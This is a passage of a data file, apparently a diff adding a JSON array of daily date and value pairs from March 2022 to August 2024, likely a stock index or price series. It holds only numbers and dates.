"2022-03-17", + 10649.870003133412 + ], + [ + "2022-03-18", + 10867.850438784237 + ], + [ + "2022-03-21", + 10837.63636493997 + ], + [ + "2022-03-22", + 11050.627951622602 + ], + [ + "2022-03-23", + 10891.81125350232 + ], + [ + "2022-03-24", + 11133.89977616549 + ], + [ + "2022-03-25", + 11124.612901556804 + ], + [ + "2022-03-28", + 11296.737395477849 + ], + [ + "2022-03-29", + 11491.152326253088 + ], + [ + "2022-03-30", + 11364.226862117672 + ], + [ + "2022-03-31", + 11223.367694930868 + ], + [ + "2022-04-01", + 11202.01030557257 + ], + [ + "2022-04-04", + 11432.64259397668 + ], + [ + "2022-04-05", + 11178.789727912499 + ], + [ + "2022-04-06", + 10936.081111378742 + ], + [ + "2022-04-07", + 10962.087266973083 + ], + [ + "2022-04-08", + 10808.846569204705 + ], + [ + "2022-04-11", + 10553.138266012133 + ], + [ + "2022-04-12", + 10508.557392303745 + ], + [ + "2022-04-13", + 10722.16519727027 + ], + [ + "2022-04-14", + 10476.982018634208 + ], + [ + "2022-04-18", + 10485.030643295071 + ], + [ + "2022-04-19", + 10719.379619336 + ], + [ + "2022-04-20", + 10563.044265594732 + ], + [ + "2022-04-21", + 10344.484429733579 + ], + [ + "2022-04-22", + 10073.604173541797 + ], + [ + "2022-04-25", + 10203.00807536621 + ], + [ + "2022-04-26", + 9817.89490145255 + ], + [ + "2022-04-27", + 9806.131526948213 + ], + [ + "2022-04-28", + 10154.402404879054 + ], + [ + "2022-04-29", + 9697.468796198205 + ], + [ + "2022-05-02", + 9859.376274704686 + ], + [ + "2022-05-03", + 9869.903337054542 + ], + [ + "2022-05-04", + 10203.625262546775 + ], + [ + "2022-05-05", + 9689.729249575963 + ], + [ + "2022-05-06", + 9573.63895693235 + ], + [ + "2022-05-09", + 9199.051876471874 + ], + [ + "2022-05-10", + 9310.807325401429 + ], + [ + "2022-05-11", + 9034.667898069745 + ], + [ + "2022-05-12", + 9013.305664228083 + ], + [ + "2022-05-13", + 9347.339574448955 + ], + [ + "2022-05-16", + 9238.985921737565 + ], + [ + "2022-05-17", + 9478.287897569793 + ], + [ + "2022-05-18", + 9012.996586189463 + ], + [ + "2022-05-19", + 8964.702900430946 + ], + [ + "2022-05-20", + 8936.839369914867 + ], + [ + "2022-05-23", + 9085.437114827238 + ], + [ + "2022-05-24", + 8892.261402896498 + ], + [ + "2022-05-25", + 9016.712304929611 + ], + [ + "2022-05-26", + 9266.539405318352 + ], + [ + "2022-05-27", + 9568.994066282996 + ], + [ + "2022-05-31", + 9543.608973455914 + ], + [ + "2022-06-01", + 9473.026788636547 + ], + [ + "2022-06-02", + 9732.450810569268 + ], + [ + "2022-06-03", + 9479.219007272344 + ], + [ + "2022-06-06", + 9510.793412045206 + ], + [ + "2022-06-07", + 9592.83376891698 + ], + [ + "2022-06-08", + 9523.796005394042 + ], + [ + "2022-06-09", + 9268.706827175381 + ], + [ + "2022-06-10", + 8941.79333860284 + ], + [ + "2022-06-13", + 8526.032994032177 + ], + [ + "2022-06-14", + 8541.511118379989 + ], + [ + "2022-06-15", + 8754.809845307895 + ], + [ + "2022-06-16", + 8401.584998689083 + ], + [ + "2022-06-17", + 8503.743526074657 + ], + [ + "2022-06-21", + 8718.289223020442 + ], + [ + "2022-06-22", + 8705.575360880099 + ], + [ + "2022-06-23", + 8835.222455769383 + ], + [ + "2022-06-24", + 9137.950345595755 + ], + [ + "2022-06-27", + 9070.952109569036 + ], + [ + "2022-06-28", + 8794.591773795957 + ], + [ + "2022-06-29", + 8802.656869700257 + ], + [ + "2022-06-30", + 8693.475779230304 + ], + [ + "2022-07-01", + 8750.856746882913 + ], + [ + "2022-07-05", + 8900.668519326291 + ], + [ + "2022-07-06", + 8957.741377836954 + ], + [ + "2022-07-07", + 9149.427895581617 + ], + [ + "2022-07-08", + 9160.903507774136 + ], + [ + "2022-07-11", + 8965.185410973994 + ], + [ + "2022-07-12", + 8878.336419915167 + ], + [ + "2022-07-13", + 8860.036868456193 + ], + [ + "2022-07-14", + 8891.67522040946 + ], + [ + "2022-07-15", + 9052.963573942028 + ], + [ + "2022-07-18", + 8976.351945127893 + ], + [ + "2022-07-19", + 9252.406109552372 + ], + [ + "2022-07-20", + 9399.114505952804 + ], + [ + "2022-07-21", + 9534.041118812118 + ], + [ + "2022-07-22", + 9366.857997922298 + ], + [ + "2022-07-25", + 9313.506671531819 + ], + [ + "2022-07-26", + 9130.504374665366 + ], + [ + "2022-07-27", + 9516.359723430383 + ], + [ + "2022-07-28", + 9609.410622091735 + ], + [ + "2022-07-29", + 9784.657869989182 + ], + [ + "2022-08-01", + 9778.76310263193 + ], + [ + "2022-08-02", + 9749.60997064437 + ], + [ + "2022-08-03", + 10015.115756992189 + ], + [ + "2022-08-04", + 10061.950284361485 + ], + [ + "2022-08-05", + 9979.754904022064 + ], + [ + "2022-08-08", + 9947.496458198213 + ], + [ + "2022-08-09", + 9834.903882543369 + ], + [ + "2022-08-10", + 10109.406843394712 + ], + [ + "2022-08-11", + 10052.023937948756 + ], + [ + "2022-08-12", + 10247.74300364557 + ], + [ + "2022-08-15", + 10330.559446752248 + ], + [ + "2022-08-16", + 10306.365127936024 + ], + [ + "2022-08-17", + 10188.811801316499 + ], + [ + "2022-08-18", + 10213.315198171344 + ], + [ + "2022-08-19", + 10014.183678392965 + ], + [ + "2022-08-22", + 9750.538173656902 + ], + [ + "2022-08-23", + 9742.475015545948 + ], + [ + "2022-08-24", + 9770.698975624304 + ], + [ + "2022-08-25", + 9943.466816936081 + ], + [ + "2022-08-26", + 9535.9004315272 + ], + [ + "2022-08-29", + 9441.918423163297 + ], + [ + "2022-08-30", + 9336.768911748823 + ], + [ + "2022-08-31", + 9282.488413449139 + ], + [ + "2022-09-01", + 9286.52193029796 + ], + [ + "2022-09-02", + 9155.321694042197 + ], + [ + "2022-09-06", + 9089.564614653322 + ], + [ + "2022-09-07", + 9273.186036493687 + ], + [ + "2022-09-08", + 9321.261720500826 + ], + [ + "2022-09-09", + 9525.043944308594 + ], + [ + "2022-09-12", + 9638.256613834023 + ], + [ + "2022-09-13", + 9109.726385517397 + ], + [ + "2022-09-14", + 9181.994450547418 + ], + [ + "2022-09-15", + 9029.08123985444 + ], + [ + "2022-09-16", + 8973.868662955534 + ], + [ + "2022-09-19", + 9043.753242170491 + ], + [ + "2022-09-20", + 8971.664423024939 + ], + [ + "2022-09-21", + 8811.016510193083 + ], + [ + "2022-09-22", + 8702.573718987798 + ], + [ + "2022-09-23", + 8560.881300662395 + ], + [ + "2022-09-26", + 8525.45746940854 + ], + [ + "2022-09-27", + 8528.876705766816 + ], + [ + "2022-09-28", + 8698.535357655612 + ], + [ + "2022-09-29", + 8447.778116460993 + ], + [ + "2022-09-30", + 8304.529650079092 + ], + [ + "2022-10-03", + 8499.35829973361 + ], + [ + "2022-10-04", + 8766.581939882286 + ], + [ + "2022-10-05", + 8761.922515782842 + ], + [ + "2022-10-06", + 8692.939979370252 + ], + [ + "2022-10-07", + 8361.703273843723 + ], + [ + "2022-10-10", + 8278.118495675524 + ], + [ + "2022-10-11", + 8164.391342016844 + ], + [ + "2022-10-12", + 8161.595106219173 + ], + [ + "2022-10-13", + 8353.003550618747 + ], + [ + "2022-10-14", + 8101.93432469549 + ], + [ + "2022-10-17", + 8369.47188736615 + ], + [ + "2022-10-18", + 8435.65818798107 + ], + [ + "2022-10-19", + 8404.893780826658 + ], + [ + "2022-10-20", + 8362.01428967569 + ], + [ + "2022-10-21", + 8558.08700265807 + ], + [ + "2022-10-24", + 8652.234692353022 + ], + [ + "2022-10-25", + 8831.215099130724 + ], + [ + "2022-10-26", + 8636.076402540912 + ], + [ + "2022-10-27", + 8478.848694964005 + ], + [ + "2022-10-28", + 8738.307597176945 + ], + [ + "2022-10-31", + 8636.698434204844 + ], + [ + "2022-11-01", + 8548.450356350508 + ], + [ + "2022-11-02", + 8255.434686772176 + ], + [ + "2022-11-03", + 8094.1686178630825 + ], + [ + "2022-11-04", + 8224.361201579146 + ], + [ + "2022-11-07", + 8314.784452463895 + ], + [ + "2022-11-08", + 8375.376343690128 + ], + [ + "2022-11-09", + 8182.101804298762 + ], + [ + "2022-11-10", + 8785.846512427359 + ], + [ + "2022-11-11", + 8947.738488587076 + ], + [ + "2022-11-14", + 8869.435166182251 + ], + [ + "2022-11-15", + 8992.174027794545 + ], + [ + "2022-11-16", + 8869.435166182251 + ], + [ + "2022-11-17", + 8849.859577805213 + ], + [ + "2022-11-18", + 8850.168655843832 + ], + [ + "2022-11-21", + 8759.126279985172 + ], + [ + "2022-11-22", + 8885.282440162395 + ], + [ + "2022-11-23", + 8974.461627719282 + ], + [ + "2022-11-25", + 8915.4238467562 + ], + [ + "2022-11-28", + 8784.605355789516 + ], + [ + "2022-11-29", + 8718.111914929323 + ], + [ + "2022-11-30", + 9115.530076587407 + ], + [ + "2022-12-01", + 9126.717926468105 + ], + [ + "2022-12-02", + 9090.362016615029 + ], + [ + "2022-12-05", + 8937.794702034238 + ], + [ + "2022-12-06", + 8752.601729790607 + ], + [ + "2022-12-07", + 8716.86785160146 + ], + [ + "2022-12-08", + 8820.027249250026 + ], + [ + "2022-12-09", + 8763.785704084616 + ], + [ + "2022-12-12", + 8873.787450036421 + ], + [ + "2022-12-13", + 8969.179203059233 + ], + [ + "2022-12-14", + 8902.68285550902 + ], + [ + "2022-12-15", + 8603.760791813365 + ], + [ + "2022-12-16", + 8521.729155011648 + ], + [ + "2022-12-19", + 8401.968681771508 + ], + [ + "2022-12-20", + 8395.427660333506 + ], + [ + "2022-12-21", + 8517.214096516449 + ], + [ + "2022-12-22", + 8308.838333582986 + ], + [ + "2022-12-23", + 8327.524474814403 + ], + [ + "2022-12-27", + 8209.78802672372 + ], + [ + "2022-12-28", + 8101.3965870420925 + ], + [ + "2022-12-29", + 8298.872262406674 + ], + [ + "2022-12-30", + 8293.887289025171 + ], + [ + "2023-01-03", + 8237.823051950883 + ], + [ + "2023-01-04", + 8277.066273888875 + ], + [ + "2023-01-05", + 8147.494752940069 + ], + [ + "2023-01-06", + 8372.378577384517 + ], + [ + "2023-01-09", + 8426.57575057034 + ], + [ + "2023-01-10", + 8497.900110241064 + ], + [ + "2023-01-11", + 8644.91564688677 + ], + [ + "2023-01-12", + 8691.63681334535 + ], + [ + "2023-01-13", + 8751.440991576606 + ], + [ + "2023-01-17", + 8769.196023105473 + ], + [ + "2023-01-18", + 8655.195640585067 + ], + [ + "2023-01-19", + 8570.163330787718 + ], + [ + "2023-01-20", + 8804.702210576515 + ], + [ + "2023-01-23", + 9000.305977569267 + ], + [ + "2023-01-24", + 8981.928914376469 + ], + [ + "2023-01-25", + 8961.995803127173 + ], + [ + "2023-01-26", + 9136.730504684712 + ], + [ + "2023-01-27", + 9227.682773152803 + ], + [ + "2023-01-30", + 9041.108154253776 + ], + [ + "2023-01-31", + 9176.600602769999 + ], + [ + "2023-02-01", + 9372.827370323354 + ], + [ + "2023-02-02", + 9709.216668355777 + ], + [ + "2023-02-03", + 9536.661984312013 + ], + [ + "2023-02-06", + 9455.990678438891 + ], + [ + "2023-02-07", + 9651.905461263608 + ], + [ + "2023-02-08", + 9480.284793612413 + ], + [ + "2023-02-09", + 9396.499453832945 + ], + [ + "2023-02-10", + 9334.83014950657 + ], + [ + "2023-02-13", + 9484.333812808 + ], + [ + "2023-02-14", + 9554.416046944207 + ], + [ + "2023-02-15", + 9627.612314986758 + ], + [ + "2023-02-16", + 9446.95959255182 + ], + [ + "2023-02-17", + 9380.302408153924 + ], + [ + "2023-02-21", + 9158.222570680527 + ], + [ + "2023-02-22", + 9165.074607950495 + ], + [ + "2023-02-23", + 9245.124851056358 + ], + [ + "2023-02-24", + 9090.322291851444 + ], + [ + "2023-02-27", + 9155.418583709476 + ], + [ + "2023-02-28", + 9143.584479748024 + ], + [ + "2023-03-01", + 9070.076226976835 + ], + [ + "2023-03-02", + 9145.140527804524 + ], + [ + "2023-03-03", + 9334.207148945967 + ], + [ + "2023-03-06", + 9344.794282889537 + ], + [ + "2023-03-07", + 9230.17574429189 + ], + [ + "2023-03-08", + 9276.272941293195 + ], + [ + "2023-03-09", + 9115.550423417535 + ], + [ + "2023-03-10", + 8987.534950525229 + ], + [ + "2023-03-13", + 9054.19019712978 + ], + [ + "2023-03-14", + 9262.253975334603 + ], + [ + "2023-03-15", + 9310.843174578322 + ], + [ + "2023-03-16", + 9556.285048626018 + ], + [ + "2023-03-17", + 9511.12089912061 + ], + [ + "2023-03-20", + 9544.87532140725 + ], + [ + "2023-03-21", + 9681.198114372051 + ], + [ + "2023-03-22", + 9549.556061233494 + ], + [ + "2023-03-23", + 9662.794890969088 + ], + [ + "2023-03-24", + 9698.358243343826 + ], + [ + "2023-03-27", + 9631.911309523925 + ], + [ + "2023-03-28", + 9580.750658510624 + ], + [ + "2023-03-29", + 9755.445635304579 + ], + [ + "2023-03-30", + 9847.78342601476 + ], + [ + "2023-03-31", + 10011.560875099723 + ], + [ + "2023-04-03", + 9987.227035162618 + ], + [ + "2023-04-04", + 9953.535591159709 + ], + [ + "2023-04-05", + 9855.270090605403 + ], + [ + "2023-04-06", + 9921.715086631959 + ], + [ + "2023-04-10", + 9916.100330413143 + ], + [ + "2023-04-11", + 9852.46222804766 + ], + [ + "2023-04-12", + 9765.428177724329 + ], + [ + "2023-04-13", + 9956.656407342763 + ], + [ + "2023-04-14", + 9937.937323624472 + ], + [ + "2023-04-17", + 9946.35994240103 + ], + [ + "2023-04-18", + 9946.983911858308 + ], + [ + "2023-04-19", + 9942.30607872208 + ], + [ + "2023-04-20", + 9866.500571939707 + ], + [ + "2023-04-21", + 9876.794130191422 + ], + [ + "2023-04-24", + 9856.205075894646 + ], + [ + "2023-04-25", + 9670.28058666306 + ], + [ + "2023-04-26", + 9728.929840060351 + ], + [ + "2023-04-27", + 9993.467698632054 + ], + [ + "2023-04-28", + 10062.40760359104 + ], + [ + "2023-05-01", + 10050.8651375281 + ], + [ + "2023-05-02", + 9963.20614885082 + ], + [ + "2023-05-03", + 9898.008122842146 + ], + [ + "2023-05-04", + 9863.070677718031 + ], + [ + "2023-05-05", + 10072.70213073943 + ], + [ + "2023-05-08", + 10097.658971237139 + ], + [ + "2023-05-09", + 10033.708884143018 + ], + [ + "2023-05-10", + 10142.892881302987 + ], + [ + "2023-05-11", + 10175.959386951947 + ], + [ + "2023-05-12", + 10139.460080391294 + ], + [ + "2023-05-15", + 10194.3664859416 + ], + [ + "2023-05-16", + 10205.906045314523 + ], + [ + "2023-05-17", + 10329.44133999185 + ], + [ + "2023-05-18", + 10521.291601274215 + ], + [ + "2023-05-19", + 10497.583668587731 + ], + [ + "2023-05-22", + 10532.837942923847 + ], + [ + "2023-05-23", + 10399.317199136753 + ], + [ + "2023-05-24", + 10345.973623919655 + ], + [ + "2023-05-25", + 10597.72301530721 + ], + [ + "2023-05-26", + 10868.499599555005 + ], + [ + "2023-05-30", + 10917.788342196478 + ], + [ + "2023-05-31", + 10855.710163474185 + ], + [ + "2023-06-01", + 10981.115428729996 + ], + [ + "2023-06-02", + 11063.469708123754 + ], + [ + "2023-06-05", + 11071.268357443036 + ], + [ + "2023-06-06", + 11069.396449071206 + ], + [ + "2023-06-07", + 10881.60295815781 + ], + [ + "2023-06-08", + 11016.67781220806 + ], + [ + "2023-06-09", + 11058.790906090853 + ], + [ + "2023-06-12", + 11245.651349508353 + ], + [ + "2023-06-13", + 11332.061430374406 + ], + [ + "2023-06-14", + 11414.416678664837 + ], + [ + "2023-06-15", + 11550.432331384365 + ], + [ + "2023-06-16", + 11477.746671888373 + ], + [ + "2023-06-20", + 11461.315153214538 + ], + [ + "2023-06-21", + 11305.12610287086 + ], + [ + "2023-06-22", + 11438.512170020438 + ], + [ + "2023-06-23", + 11325.116379023852 + ], + [ + "2023-06-26", + 11173.298021571129 + ], + [ + "2023-06-27", + 11365.411822748492 + ], + [ + "2023-06-28", + 11387.591805381988 + ], + [ + "2023-06-29", + 11364.786884394543 + ], + [ + "2023-06-30", + 11540.036070085334 + ], + [ + "2023-07-03", + 11567.211683963733 + ], + [ + "2023-07-05", + 11566.899699235095 + ], + [ + "2023-07-06", + 11478.806644848406 + ], + [ + "2023-07-07", + 11440.697032017579 + ], + [ + "2023-07-10", + 11444.443755451255 + ], + [ + "2023-07-11", + 11500.988565275247 + ], + [ + "2023-07-12", + 11646.246523356514 + ], + [ + "2023-07-13", + 11843.981863029403 + ], + [ + "2023-07-14", + 11841.485016303624 + ], + [ + "2023-07-17", + 11952.06713136243 + ], + [ + "2023-07-18", + 12049.842370200304 + ], + [ + "2023-07-19", + 12047.031600952541 + ], + [ + "2023-07-20", + 11769.323529907611 + ], + [ + "2023-07-21", + 11734.024686324547 + ], + [ + "2023-07-24", + 11752.767992459658 + ], + [ + "2023-07-25", + 11832.425832413042 + ], + [ + "2023-07-26", + 11793.065373977644 + ], + [ + "2023-07-27", + 11764.94993032664 + ], + [ + "2023-07-28", + 11979.245651930847 + ], + [ + "2023-07-31", + 11985.492128780319 + ], + [ + "2023-08-01", + 11957.690607651299 + ], + [ + "2023-08-02", + 11695.29013513977 + ], + [ + "2023-08-03", + 11676.545860107986 + ], + [ + "2023-08-04", + 11621.87877203586 + ], + [ + "2023-08-07", + 11720.27798033101 + ], + [ + "2023-08-08", + 11620.630833121306 + ], + [ + "2023-08-09", + 11492.864366673908 + ], + [ + "2023-08-10", + 11514.107426224817 + ], + [ + "2023-08-11", + 11440.697032017579 + ], + [ + "2023-08-14", + 11569.086499025581 + ], + [ + "2023-08-15", + 11446.32147720312 + ], + [ + "2023-08-16", + 11325.116379023852 + ], + [ + "2023-08-17", + 11201.41249632546 + ], + [ + "2023-08-18", + 11187.35574339663 + ], + [ + "2023-08-21", + 11367.601529228996 + ], + [ + "2023-08-22", + 11351.356038716336 + ], + [ + "2023-08-23", + 11530.35001004746 + ], + [ + "2023-08-24", + 11283.881105526605 + ], + [ + "2023-08-25", + 11371.348252662674 + ], + [ + "2023-08-28", + 11456.940584736893 + ], + [ + "2023-08-29", + 11707.158150484767 + ], + [ + "2023-08-30", + 11772.448221677358 + ], + [ + "2023-08-31", + 11807.748034157095 + ], + [ + "2023-09-01", + 11795.251204871458 + ], + [ + "2023-09-05", + 11810.245849779547 + ], + [ + "2023-09-06", + 11706.223165195526 + ], + [ + "2023-09-07", + 11622.503710389808 + ], + [ + "2023-09-08", + 11638.747263109124 + ], + [ + "2023-09-11", + 11775.881991485723 + ], + [ + "2023-09-12", + 11645.307662480582 + ], + [ + "2023-09-13", + 11689.66375216088 + ], + [ + "2023-09-14", + 11785.255097898289 + ], + [ + "2023-09-15", + 11583.456205579721 + ], + [ + "2023-09-18", + 11595.530595916023 + ], + [ + "2023-09-19", + 11570.817917379856 + ], + [ + "2023-09-20", + 11404.076613372828 + ], + [ + "2023-09-21", + 11195.102072295582 + ], + [ + "2023-09-22", + 11196.668778215482 + ], + [ + "2023-09-25", + 11249.848609894876 + ], + [ + "2023-09-26", + 11080.918568304018 + ], + [ + "2023-09-27", + 11106.882092444757 + ], + [ + "2023-09-28", + 11199.796376675247 + ], + [ + "2023-09-29", + 11207.929295346641 + ], + [ + "2023-10-02", + 11301.467549034407 + ], + [ + "2023-10-03", + 11103.13149342439 + ], + [ + "2023-10-04", + 11254.228991752558 + ], + [ + "2023-10-05", + 11221.068503126338 + ], + [ + "2023-10-06", + 11409.082902481132 + ], + [ + "2023-10-09", + 11467.26902326883 + ], + [ + "2023-10-10", + 11530.773417893468 + ], + [ + "2023-10-11", + 11613.050185553402 + ], + [ + "2023-10-12", + 11572.693701338376 + ], + [ + "2023-10-13", + 11427.225492679114 + ], + [ + "2023-10-16", + 11556.426895098914 + ], + [ + "2023-10-17", + 11518.575008783047 + ], + [ + "2023-10-18", + 11367.476541558206 + ], + [ + "2023-10-19", + 11261.11106481938 + ], + [ + "2023-10-20", + 11093.119884104455 + ], + [ + "2023-10-23", + 11126.592357459313 + ], + [ + "2023-10-24", + 11234.83361815666 + ], + [ + "2023-10-25", + 10959.852022348958 + ], + [ + "2023-10-26", + 10750.877481271711 + ], + [ + "2023-10-27", + 10802.498358204588 + ], + [ + "2023-10-30", + 10924.187904720251 + ], + [ + "2023-10-31", + 10976.430813317058 + ], + [ + "2023-11-01", + 11166.947872777666 + ], + [ + "2023-11-02", + 11369.664310245365 + ], + [ + "2023-11-03", + 11503.245125626174 + ], + [ + "2023-11-06", + 11550.170729282712 + ], + [ + "2023-11-07", + 11659.350850855992 + ], + [ + "2023-11-08", + 11666.858831173437 + ], + [ + "2023-11-09", + 11577.076020989402 + ], + [ + "2023-11-10", + 11837.35364089085 + ], + [ + "2023-11-13", + 11800.4377087609 + ], + [ + "2023-11-14", + 12054.461100639492 + ], + [ + "2023-11-15", + 12063.533849083491 + ], + [ + "2023-11-16", + 12073.85647423539 + ], + [ + "2023-11-17", + 12076.671119069844 + ], + [ + "2023-11-20", + 12223.703126958988 + ], + [ + "2023-11-21", + 12152.690752016904 + ], + [ + "2023-11-22", + 12202.431969404568 + ], + [ + "2023-11-24", + 12185.224364495827 + ], + [ + "2023-11-27", + 12174.588785718619 + ], + [ + "2023-11-28", + 12206.498428740266 + ], + [ + "2023-11-29", + 12194.609097668466 + ], + [ + "2023-11-30", + 12163.952238044736 + ], + [ + "2023-12-01", + 12198.67749479751 + ], + [ + "2023-12-04", + 12085.431882785206 + ], + [ + "2023-12-05", + 12115.775788783625 + ], + [ + "2023-12-06", + 12045.699368027455 + ], + [ + "2023-12-07", + 12214.00640905771 + ], + [ + "2023-12-08", + 12268.439993031696 + ], + [ + "2023-12-11", + 12373.237794953948 + ], + [ + "2023-12-12", + 12471.781368853344 + ], + [ + "2023-12-13", + 12630.389754188976 + ], + [ + "2023-12-14", + 12619.441221786456 + ], + [ + "2023-12-15", + 12680.441987408607 + ], + [ + "2023-12-18", + 12760.312984630005 + ], + [ + "2023-12-19", + 12825.51101063868 + ], + [ + "2023-12-20", + 12634.928066204322 + ], + [ + "2023-12-21", + 12781.941665056684 + ], + [ + "2023-12-22", + 12801.060903100837 + ], + [ + "2023-12-26", + 12879.42623489272 + ], + [ + "2023-12-27", + 12905.644578858404 + ], + [ + "2023-12-28", + 12899.372910695438 + ], + [ + "2023-12-29", + 12843.546053305981 + ], + [ + "2024-01-02", + 12626.207027252543 + ], + [ + "2024-01-03", + 12492.601989454915 + ], + [ + "2024-01-04", + 12428.310850731972 + ], + [ + "2024-01-05", + 12443.049706918446 + ], + [ + "2024-01-08", + 12700.222981880275 + ], + [ + "2024-01-09", + 12725.31256122216 + ], + [ + "2024-01-10", + 12811.558898550511 + ], + [ + "2024-01-11", + 12838.216152708967 + ], + [ + "2024-01-12", + 12844.80271229059 + ], + [ + "2024-01-16", + 12843.546053305981 + ], + [ + "2024-01-17", + 12771.099711288169 + ], + [ + "2024-01-18", + 12952.375434283711 + ], + [ + "2024-01-19", + 13209.234786723558 + ], + [ + "2024-01-22", + 13226.483085292555 + ], + [ + "2024-01-23", + 13281.369144012731 + ], + [ + "2024-01-24", + 13355.069238325133 + ], + [ + "2024-01-25", + 13371.379644914872 + ], + [ + "2024-01-26", + 13291.717929374796 + ], + [ + "2024-01-29", + 13427.830471761603 + ], + [ + "2024-01-30", + 13338.447815903432 + ], + [ + "2024-01-31", + 13077.197423742504 + ], + [ + "2024-02-01", + 13231.189016432294 + ], + [ + "2024-02-02", + 13454.802617338715 + ], + [ + "2024-02-05", + 13437.241365144408 + ], + [ + "2024-02-06", + 13410.26728177395 + ], + [ + "2024-02-07", + 13548.261421499314 + ], + [ + "2024-02-08", + 13573.353907531215 + ], + [ + "2024-02-09", + 13706.956038638824 + ], + [ + "2024-02-12", + 13653.326638903256 + ], + [ + "2024-02-13", + 13440.376714777554 + ], + [ + "2024-02-14", + 13586.839011423099 + ], + [ + "2024-02-15", + 13627.296260892093 + ], + [ + "2024-02-16", + 13503.728992624565 + ], + [ + "2024-02-20", + 13401.800093750442 + ], + [ + "2024-02-21", + 13348.168756221528 + ], + [ + "2024-02-22", + 13738.948037877659 + ], + [ + "2024-02-23", + 13698.487881718644 + ], + [ + "2024-02-26", + 13691.2754148864 + ], + [ + "2024-02-27", + 13724.205306104495 + ], + [ + "2024-02-28", + 13651.131119042715 + ], + [ + "2024-02-29", + 13768.11473441864 + ], + [ + "2024-03-01", + 13975.417928735324 + ], + [ + "2024-03-04", + 13925.552692573543 + ], + [ + "2024-03-05", + 13675.594791133975 + ], + [ + "2024-03-06", + 13761.528174837016 + ], + [ + "2024-03-07", + 13970.401950660293 + ], + [ + "2024-03-08", + 13768.740641669261 + ], + [ + "2024-03-11", + 13717.620684316218 + ], + [ + "2024-03-12", + 13914.262139645527 + ], + [ + "2024-03-13", + 13807.314356006355 + ], + [ + "2024-03-14", + 13772.504805243048 + ], + [ + "2024-03-15", + 13608.792272235161 + ], + [ + "2024-03-18", + 13738.585670522036 + ], + [ + "2024-03-19", + 13772.815821075013 + ], + [ + "2024-03-20", + 13936.114635203621 + ], + [ + "2024-03-21", + 14002.063556133708 + ], + [ + "2024-03-22", + 14018.081355928261 + ], + [ + "2024-03-25", + 13967.20556053676 + ], + [ + "2024-03-26", + 13921.982308334314 + ], + [ + "2024-03-27", + 13969.401080397301 + ], + [ + "2024-03-28", + 13943.652651317921 + ], + [ + "2024-04-01", + 13973.17299514447 + ], + [ + "2024-04-02", + 13852.580239662406 + ], + [ + "2024-04-03", + 13883.671164995547 + ], + [ + "2024-04-04", + 13671.380090607341 + ], + [ + "2024-04-05", + 13832.480478185389 + ], + [ + "2024-04-08", + 13836.565346557869 + ], + [ + "2024-04-09", + 13887.75409557468 + ], + [ + "2024-04-10", + 13766.533495048647 + ], + [ + "2024-04-11", + 13986.361616654482 + ], + [ + "2024-04-12", + 13763.39426982881 + ], + [ + "2024-04-15", + 13536.97183746797 + ], + [ + "2024-04-16", + 13538.227527555906 + ], + [ + "2024-04-17", + 13373.042271605378 + ], + [ + "2024-04-18", + 13296.730031863135 + ], + [ + "2024-04-19", + 13021.634106248046 + ], + [ + "2024-04-22", + 13152.58727385225 + ], + [ + "2024-04-23", + 13348.862486239244 + ], + [ + "2024-04-24", + 13394.08476954502 + ], + [ + "2024-04-25", + 13329.393476496214 + ], + [ + "2024-04-26", + 13535.087333439395 + ], + [ + "2024-04-29", + 13590.044121616686 + ], + [ + "2024-04-30", + 13333.788391803986 + ], + [ + "2024-05-01", + 13237.378328378072 + ], + [ + "2024-05-02", + 13406.330654592406 + ], + [ + "2024-05-03", + 13675.776943708459 + ], + [ + "2024-05-06", + 13825.572244908399 + ], + [ + "2024-05-07", + 13827.772609252304 + ], + [ + "2024-05-08", + 13819.606748094035 + ], + [ + "2024-05-09", + 13849.754936964551 + ], + [ + "2024-05-10", + 13882.414506010939 + ], + [ + "2024-05-13", + 13914.44719891003 + ], + [ + "2024-05-14", + 14003.947091265609 + ], + [ + "2024-05-15", + 14222.833445305492 + ], + [ + "2024-05-16", + 14193.941915419584 + ], + [ + "2024-05-17", + 14187.03174434925 + ], + [ + "2024-05-20", + 14285.956094641051 + ], + [ + "2024-05-21", + 14313.903919167664 + ], + [ + "2024-05-22", + 14311.07861646981 + ], + [ + "2024-05-23", + 14246.700277046315 + ], + [ + "2024-05-24", + 14381.42245270767 + ], + [ + "2024-05-28", + 14435.75042694432 + ], + [ + "2024-05-29", + 14334.002711748008 + ], + [ + "2024-05-30", + 14180.436464697572 + ], + [ + "2024-05-31", + 14154.058252780878 + ], + [ + "2024-06-03", + 14230.056570001138 + ], + [ + "2024-06-04", + 14268.997496177219 + ], + [ + "2024-06-05", + 14556.657104948368 + ], + [ + "2024-06-06", + 14551.633375699956 + ], + [ + "2024-06-07", + 14538.756738918584 + ], + [ + "2024-06-10", + 14597.481566256352 + ], + [ + "2024-06-11", + 14697.659668842743 + ], + [ + "2024-06-12", + 14890.165873172587 + ], + [ + "2024-06-13", + 14970.873997119277 + ], + [ + "2024-06-14", + 15048.441926949454 + ], + [ + "2024-06-17", + 15232.782270121028 + ], + [ + "2024-06-18", + 15237.494014640804 + ], + [ + "2024-06-20", + 15120.043391068593 + ], + [ + "2024-06-21", + 15079.531883385922 + ], + [ + "2024-06-24", + 14907.855988624378 + ], + [ + "2024-06-25", + 15078.3362648917 + ], + [ + "2024-06-26", + 15109.476603955152 + ], + [ + "2024-06-27", + 15148.478570621619 + ], + [ + "2024-06-28", + 15069.8438855547 + ], + [ + "2024-07-01", + 15158.230515633244 + ], + [ + "2024-07-02", + 15317.386327589003 + ], + [ + "2024-07-03", + 15445.088846855999 + ], + [ + "2024-07-05", + 15606.133038427024 + ], + [ + "2024-07-08", + 15643.246625478223 + ], + [ + "2024-07-09", + 15656.772423030365 + ], + [ + "2024-07-10", + 15820.016978945294 + ], + [ + "2024-07-11", + 15473.083178422903 + ], + [ + "2024-07-12", + 15563.984095367337 + ], + [ + "2024-07-15", + 15605.816209215021 + ], + [ + "2024-07-16", + 15611.792363892786 + ], + [ + "2024-07-17", + 15153.511019940088 + ], + [ + "2024-07-18", + 15081.795226013557 + ], + [ + "2024-07-19", + 14948.11752096547 + ], + [ + "2024-07-22", + 15170.812607826088 + ], + [ + "2024-07-23", + 15117.339200454839 + ], + [ + "2024-07-24", + 14575.074861801422 + ], + [ + "2024-07-25", + 14414.34459275238 + ], + [ + "2024-07-26", + 14562.180784879942 + ], + [ + "2024-07-29", + 14591.430806534781 + ], + [ + "2024-07-30", + 14391.070725775306 + ], + [ + "2024-07-31", + 14816.955071679944 + ], + [ + "2024-08-01", + 14458.067992905351 + ], + [ + "2024-08-02", + 14114.90610713013 + ], + [ + "2024-08-05", + 13694.05421054396 + ], + [ + "2024-08-06", + 13824.900799514156 + ], + [ 